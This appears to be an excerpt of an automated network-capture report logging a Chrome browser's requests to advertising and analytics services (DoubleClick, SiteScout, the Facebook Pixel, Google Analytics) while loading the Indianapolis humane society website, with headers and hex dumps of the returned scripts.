                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                        X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC785INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:17 GMT
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                        Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Server: cafe
                                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                                        Set-Cookie: test_cookie=CheckForPermission; expires=Thu, 09-Jan-2025 02:14:17 GMT; path=/; domain=.doubleclick.net; Secure; SameSite=none
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC18INData Raw: 64 0d 0a 3c 68 74 6d 6c 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: d<html></html>
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        110192.168.2.44988541.63.96.24432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC352OUTGET /assets/up.js?um=1 HTTP/1.1
                                                                                                                                                                                                                                                        Host: up.pixel.ad
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        Vary: accept-encoding
                                                                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                                                                        Server: AC1.1
                                                                                                                                                                                                                                                        X-LLID: 9cc63c10cbb54930a5354a28b1741956
                                                                                                                                                                                                                                                        Age: 255742
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:17 GMT
                                                                                                                                                                                                                                                        Last-Modified: Fri, 06 Dec 2024 15:53:52 GMT
                                                                                                                                                                                                                                                        Content-Length: 3738
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC3738INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 6f 2c 69 29 7b 6f 2e 63 6e 74 72 55 70 54 61 67 3d 7b 70 69 78 65 6c 73 65 72 76 3a 22 68 74 74 70 73 3a 2f 2f 70 69 78 65 6c 2e 73 69 74 65 73 63 6f 75 74 2e 63 6f 6d 22 2c 70 69 78 65 6c 73 79 6e 63 3a 22 68 74 74 70 73 3a 2f 2f 70 69 78 65 6c 2d 73 79 6e 63 2e 73 69 74 65 73 63 6f 75 74 2e 63 6f 6d 22 2c 63 6c 69 63 6b 73 65 72 76 3a 22 68 74 74 70 73 3a 2f 2f 63 6c 69 63 6b 73 65 72 76 2e 73 69 74 65 73 63 6f 75 74 2e 63 6f 6d 2f 63 6f 6e 76 2f 22 2c 76 65 6e 64 6f 72 49 64 3a 31 35 36 2c 73 79 6e 63 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 6f 2e 63 6e 74 72 55 70 54 61 67 2e 70 69 78 65 6c 73 79 6e 63 2b 22 2f 64 6d 70 2f 61 73 79 6e 63 50 69 78 65 6c 53 79 6e 63 22 2c 61 3d 69 2e 63 72 65 61 74 65 45 6c 65
                                                                                                                                                                                                                                                        Data Ascii: !function(o,i){o.cntrUpTag={pixelserv:"https://pixel.sitescout.com",pixelsync:"https://pixel-sync.sitescout.com",clickserv:"https://clickserv.sitescout.com/conv/",vendorId:156,sync:function(){var r=o.cntrUpTag.pixelsync+"/dmp/asyncPixelSync",a=i.createEle


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        111192.168.2.449881157.240.0.64432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1374OUTGET /signals/config/1174527456525563?v=2.9.179&r=stable&domain=indyhumane.org&hme=b8122d5d96cd6f542162ba4f497489972d1ebe228d24c39d34f560e30ae932ce&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1
                                                                                                                                                                                                                                                        Host: connect.facebook.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1452INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                                        timing-allow-origin: *
                                                                                                                                                                                                                                                        reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                                        report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                                        content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-KaqI8D4c' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                                                                                                                                        document-policy: force-load-at-top
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1670INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                                                                                                                                        Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC906INData Raw: 2f 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69
                                                                                                                                                                                                                                                        Data Ascii: /*** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wi
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC15478INData Raw: 54 48 45 52 0a 2a 20 49 4e 20 41 4e 20 41 43 54 49 4f 4e 20 4f 46 20 43 4f 4e 54 52 41 43 54 2c 20 54 4f 52 54 20 4f 52 20 4f 54 48 45 52 57 49 53 45 2c 20 41 52 49 53 49 4e 47 20 46 52 4f 4d 2c 20 4f 55 54 20 4f 46 20 4f 52 20 49 4e 0a 2a 20 43 4f 4e 4e 45 43 54 49 4f 4e 20 57 49 54 48 20 54 48 45 20 53 4f 46 54 57 41 52 45 20 4f 52 20 54 48 45 20 55 53 45 20 4f 52 20 4f 54 48 45 52 20 44 45 41 4c 49 4e 47 53 20 49 4e 20 54 48 45 20 53 4f 46 54 57 41 52 45 2e 0a 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 65 2e 65 78 70 6f 72 74 73 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 66 3d 61 2e 66 62 71 3b 66 2e 65 78 65 63 53 74 61 72 74 3d 61 2e 70 65 72 66 6f 72 6d 61 6e 63
                                                                                                                                                                                                                                                        Data Ascii: THER* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.*/(function(a,b,c,d){var e={exports:{}};e.exports;(function(){var f=a.fbq;f.execStart=a.performanc
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1500INData Raw: 69 6f 6e 20 67 28 61 2c 62 29 7b 69 66 28 21 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 62 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 66 75 6e 63 74 69 6f 6e 20 68 28 61 2c 62 29 7b 69 66 28 21 61 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 62 26 26 28 74 79 70 65 6f 66 20 62 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 62 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 62 3a 61
                                                                                                                                                                                                                                                        Data Ascii: ion g(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")}function h(a,b){if(!a)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return b&&(typeof b==="object"||typeof b==="function")?b:a
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC14884INData Raw: 41 72 72 61 79 2e 66 72 6f 6d 28 63 2e 76 61 6c 75 65 73 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 68 28 61 2c 62 29 7b 61 3d 67 28 61 2c 62 29 3b 76 61 72 20 64 3d 22 22 3b 62 3d 5b 5d 2e 63 6f 6e 63 61 74 28 6a 28 61 29 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 2e 70 61 72 61 6d 43 6f 6e 66 69 67 2e 71 75 65 72 79 2e 6c 6f 63 61 6c 65 43 6f 6d 70 61 72 65 28 62 2e 70 61 72 61 6d 43 6f 6e 66 69 67 2e 71 75 65 72 79 29 7d 29 3b 62 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 61 6d 43 6f 6e 66 69 67 2e 70 72 65 66 69 78 2c 65 3d 61 2e 70 61 72 61 6d 43 6f 6e 66 69 67 2e 65 62 70 5f 70 61 74 68 3b 61 3d 61 2e 70 61 72 61 6d 56 61 6c 75 65 21 3d 6e 75 6c 6c 3f 61 2e
                                                                                                                                                                                                                                                        Data Ascii: Array.from(c.values())}function h(a,b){a=g(a,b);var d="";b=[].concat(j(a)).sort(function(a,b){return a.paramConfig.query.localeCompare(b.paramConfig.query)});b.forEach(function(a){var b=a.paramConfig.prefix,e=a.paramConfig.ebp_path;a=a.paramValue!=null?a.
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1500INData Raw: 6f 6e 28 61 29 7b 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 3d 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 61 5d 28 29 29 3b 72 65 74 75 72 6e 20 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 7d 2c 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 21 21 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 61 5d 7d 2c 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 61 29 7b 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64
                                                                                                                                                                                                                                                        Data Ascii: on(a){f.__fbeventsResolvedModules[a]||(f.__fbeventsResolvedModules[a]=f.__fbeventsModules[a]());return f.__fbeventsResolvedModules[a]},f.fbIsModuleLoaded=function(a){return!!f.__fbeventsModules[a]},f.ensureModuleRegistered=function(b,a){f.fbIsModuleLoaded
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC14884INData Raw: 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 21 6f 28 61 2e 69 64 29 3f 7b 7d 3a 7b 69 61 62 3a 31 7d 7d 29 3b 67 2e 6c 69 73 74 65 6e 28 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 69 66 28 21 6f 28 62 29 29 72 65 74 75 72 6e 3b 62 3d 61 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 2b 22 5f 22 2b 44 61 74 65 2e 6e 6f 77 28 29 2b 22 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 62 3d 6c 28 62 29 3b 76 61 72 20 64 3d 63 2e 67 65 74 28 22 65 69 64 22 29 3b 69 66 28 64 21 3d 6e 75 6c 6c 26 26 64 21 3d 3d 22 22 7c 7c 62 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 63 2e 61 70 70 65 6e 64 28 22 61 70 63 6d 5f 65 69 64 22 2c 22 31 22 29 3b 64 3d 22 70 63 6d 5f 70 6c 75 67 69 6e 2d 73 65 74 5f 22 2b 62 3b 63 2e 61 70 70 65 6e 64 28 22 65 69 64
                                                                                                                                                                                                                                                        Data Ascii: function(a,b){return!o(a.id)?{}:{iab:1}});g.listen(function(b,c){if(!o(b))return;b=a.location.origin+"_"+Date.now()+"_"+Math.random();b=l(b);var d=c.get("eid");if(d!=null&&d!==""||b==null)return;c.append("apcm_eid","1");d="pcm_plugin-set_"+b;c.append("eid
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC1500INData Raw: 76 65 72 73 69 6f 6e 29 7d 63 61 74 63 68 28 61 29 7b 66 3d 21 30 2c 67 3d 61 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 21 65 26 26 68 5b 22 72 65 74 75 72 6e 22 5d 26 26 68 5b 22 72 65 74 75 72 6e 22 5d 28 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 66 29 74 68 72 6f 77 20 67 7d 7d 75 2e 73 65 74 28 71 2c 53 74 72 69 6e 67 28 62 29 29 3b 78 28 64 2c 75 2c 73 29 7d 29 5b 22 63 61 74 63 68 22 5d 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 6d 65 73 73 61 67 65 3d 22 5b 43 6c 69 65 6e 74 48 69 6e 74 20 45 72 72 6f 72 5d 22 2b 61 2e 6d 65 73 73 61 67 65 2c 6a 28 61 29 7d 29 3b 68 2e 6c 69 73 74 65 6e 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 62 3d 64 2e 67 65 74 50 69 78 65 6c 28 62 29 3b 69 66 28 62 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 62 3d 64 2e 70 6c 75 67 69
                                                                                                                                                                                                                                                        Data Ascii: version)}catch(a){f=!0,g=a}finally{try{!e&&h["return"]&&h["return"]()}finally{if(f)throw g}}u.set(q,String(b));x(d,u,s)})["catch"](function(a){a.message="[ClientHint Error]"+a.message,j(a)});h.listen(function(b){b=d.getPixel(b);if(b==null)return;b=d.plugi
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC14884INData Raw: 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 20 6f 6e 20 74 68 69 73 20 70 61 67 65 22 7d 2c 22 2a 22 29 3b 22 65 72 72 6f 72 22 69 6e 20 63 6f 6e 73 6f 6c 65 26 26 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 46 61 63 65 62 6f 6f 6b 20 50 69 78 65 6c 20 45 72 72 6f 72 3a 20 50 69 78 65 6c 20 63 6f 64 65 20 69 73 20 6e 6f 74 20 69 6e 73 74 61 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 20 6f 6e 20 74 68 69 73 20 70 61 67 65 22 29 3b 72 65 74 75 72 6e 21 31 7d 72 65 74 75 72 6e 21 30 7d 28 29 29 72 65 74 75 72 6e 3b 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 3d 7b 7d 2c 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 3d 7b 7d 2c 66 2e 67 65 74 46 62 65
                                                                                                                                                                                                                                                        Data Ascii: led correctly on this page"},"*");"error"in console&&console.error("Facebook Pixel Error: Pixel code is not installed correctly on this page");return!1}return!0}())return;f.__fbeventsModules||(f.__fbeventsModules={},f.__fbeventsResolvedModules={},f.getFbe
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC3805INData Raw: 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 29 2c 67 3d 21 30 2c 68 28 29 29 3a 73 2e 69 63 65 43 6f 6e 6e 65 63 74 69 6f 6e 53 74 61 74 65 3d 3d 3d 22 63 6c 6f 73 65 64 22 26 26 28 61 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 66 72 65 65 7a 65 22 2c 68 29 2c 61 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 70 61 67 65 68 69 64 65 22 2c 68 29 29 7d 3b 73 2e 63 72 65 61 74 65 44 61 74 61 43 68 61 6e 6e 65 6c 28 22 66 6f 6f 22 29 7d 7d 63 61 74 63 68 28 61 29 7b 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 26 26 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 22 6d 65 73 73 61 67 65 22 29 26 26 28 61 2e 6d 65 73 73 61 67 65 3d
                                                                                                                                                                                                                                                        Data Ascii: w Date().getTime()),g=!0,h()):s.iceConnectionState==="closed"&&(a.removeEventListener("freeze",h),a.removeEventListener("pagehide",h))};s.createDataChannel("foo")}}catch(a){a instanceof Error&&Object.prototype.hasOwnProperty.call(a,"message")&&(a.message=


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        112192.168.2.44989134.36.216.1504432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC703OUTGET /dmp/asyncPixelSync HTTP/1.1
                                                                                                                                                                                                                                                        Host: pixel-sync.sitescout.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC416INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                        set-cookie: ssi=8b05cf9f-7156-4e8e-80d8-30a255c1b07a#1736387957364; Domain=.sitescout.com; Expires=Fri, 09 Jan 2026 01:59:17 GMT; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                        location: https://pixel-sync.sitescout.com/dmp/asyncPixelSync?cookieQ=1
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        date: Thu, 09 Jan 2025 01:59:16 GMT
                                                                                                                                                                                                                                                        server: A
                                                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        113192.168.2.449889173.194.76.1544432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:17 UTC874OUTPOST /g/collect?v=2&tid=G-VFFY2PDZ27&cid=932040568.1736387953&gtm=45je5170v9118100243z8898710595za200zb898710595&aip=1&dma=0&gcd=13l3l3l3l1l1&npa=0&frm=0&tag_exp=101925629~102067555~102067808~102081485~102198178 HTTP/1.1
                                                                                                                                                                                                                                                        Host: stats.g.doubleclick.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
